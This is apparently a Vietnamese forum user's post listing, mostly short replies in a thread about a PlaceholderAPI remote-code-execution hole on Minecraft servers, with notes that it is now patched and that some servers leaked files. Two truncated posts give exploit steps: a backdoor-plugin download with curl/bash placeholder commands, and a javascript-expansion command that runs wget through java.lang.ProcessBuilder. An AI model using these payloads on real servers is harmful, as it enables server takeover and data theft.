• Chào bạn, hãy đăng ký hoặc đăng nhập để tham gia cùng bọn mình và sử dụng được đầy đủ chức năng của diễn đàn :).
  1. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    ảnh trên là của isnow (retired)
  2. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    vậy là ko phải do essentials hay luckperm đâu nha yên tâm dùng tiếp thôi
  3. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    đây cũng chính là cách mà aemine đã bị pwned
  4. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    bonus: nếu server bạn sử dụng plugin plugmanX hoặc plugmanager,commandpanel thì hãy vào config của nó và tắt cái download đi vì nó cho phép download backdoor plugin /cpi lmfao.jar/papi register ../../CommandPanels/panels/lmfao.jar.yml /papi parse me %rce_curl_-O_/papi parse me %rce_bash_raw%...
  5. jordu

    Hỏi về server Tăng Bảo Mật

    firewall xin han hanh tai tro
  6. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    uoc dc chit vo cua hung a zet
  7. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    rce exploit bi li
  8. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    hiện tại thì author đã patch = cách không cho cài thông qua minecraft mà phải tải expasion + có config không cho dùng rồi
  9. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    m cứ tưởng tượng nó tìm đc một cái port không có bảo mật xem?
  10. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    còn một số server khác nhưng t không tiện nhắc tên v:
  11. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    một phút mặc niệm
  12. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    chắc giờ đỡ chứ từ mấy hôm trc thì hơn chục server bị leak file rồi :/
  13. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    cách thực hiện cái exploit này 1: Griefer sẽ cài expansion này lên nạn nhân [/papi ecloud download javascript] lệnh cho các cháu không biết dùng placeholderapi 2: Nó sẽ sử dụng lệnh /jsexpansion parse me new java.lang.ProcessBuilder("wget", "").start(); [trong cái pastebin có thể là một...
  14. jordu

    Thảo luận MC Server Lỗ hổng placeholderapi

    hiện tại thì bị patch rồi nên quẩy tiếp đi
Back
Top Bottom